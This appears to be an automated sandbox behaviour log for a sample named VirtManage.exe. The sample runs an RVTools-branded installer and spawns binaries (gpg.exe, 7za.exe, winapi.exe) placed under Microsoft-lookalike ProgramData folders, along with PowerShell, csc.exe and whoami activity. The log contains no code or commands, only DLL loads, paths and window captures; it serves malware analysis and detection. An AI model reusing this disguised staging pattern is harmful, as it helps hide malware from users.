Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptnet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: riched20.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: usp10.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msls31.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libassuan-9.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgcrypt-20.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libnpth-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libsqlite3-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: zlib1.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: libgpg-error-0.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: wldp.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dispex.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exeSection loaded: aclui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeSection loaded: esscli.dll
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeSection loaded: mfc42u.dll
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exeSection loaded: aclui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\whoami.exeSection loaded: version.dll
Source: C:\Windows\System32\whoami.exeSection loaded: authz.dll
Source: C:\Windows\System32\whoami.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exeSection loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\whoami.exeSection loaded: version.dll
Source: C:\Windows\System32\whoami.exeSection loaded: authz.dll
Source: C:\Windows\System32\whoami.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exeSection loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\VirtManage.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: I Agree
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\msiexec.exeWindow detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third 